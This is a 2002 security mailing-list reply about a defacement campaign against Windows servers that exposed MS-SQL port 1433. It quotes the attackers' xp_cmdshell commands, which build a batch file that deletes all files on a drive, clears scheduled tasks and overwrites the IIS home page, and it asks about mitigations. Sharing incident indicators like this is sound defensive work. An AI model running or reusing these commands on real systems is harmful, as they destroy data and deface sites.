Security Incidents mailing list archives

RE: Windows Systems Defaced

From: "Steve Zenone" <zenone () cats ucsc edu>
Date: Thu, 2 May 2002 20:23:56 -0700

Hello,

Stephen W. Thompson wrote:
|> Have any of you seen similar activity? Any thoughts?
|
|Yes, we had one that matches most of your details.  These
|are exact matches:
|
|>  [] Damage occurred around 1600 on 5/1/2002
|BUT=>   (approx. 16:00 EDT for us)
|>  [] Win-popup message with "F---ing University of Rochester"
|>       -- NOTE: not all systems running IIS
|>  [] Admins claimed that all systems were patched correctly
|>  [] Most were running updated and current AV

Thank you very much for your reply - it definitely helps!

We have been seeing MS-SQL (1433/tcp) attacks that try and execute
the following:

-----BEGIN SNIPPET-----
    xp_cmdshell 'echo net send localhost F---ing University of Rochester
rebooting... > rochester.bat'

    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'

    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'

    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'

    xp_cmdshell 'at /delete /y'

    xp_cmdshell 'echo if exist \inetpub\wwwroot\ type
%systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >>
rochester.bat'
-----END SNIPPET-----

The above commands were directed to systems that were listening on
port 1433/tcp and accessible from the outside. It appears that there
were multiple source IPs involved in this attack.

At this time, I am not completely clear on how to protect from this
attack. What I've researched is that since external functions such
as xp_cmdshell, xp_startmail, xp_sendmail, and xp_stopmail present
possible security risks, it is recommended to drop such external
system functions.  Else, deny EXECUTE permission on them to specific
users/roles if dropping these procedures would break any of the SQL
Server. I haven't tested this - but does anyone on this list know if
this is a safe and effective solution?

Regards,
Steve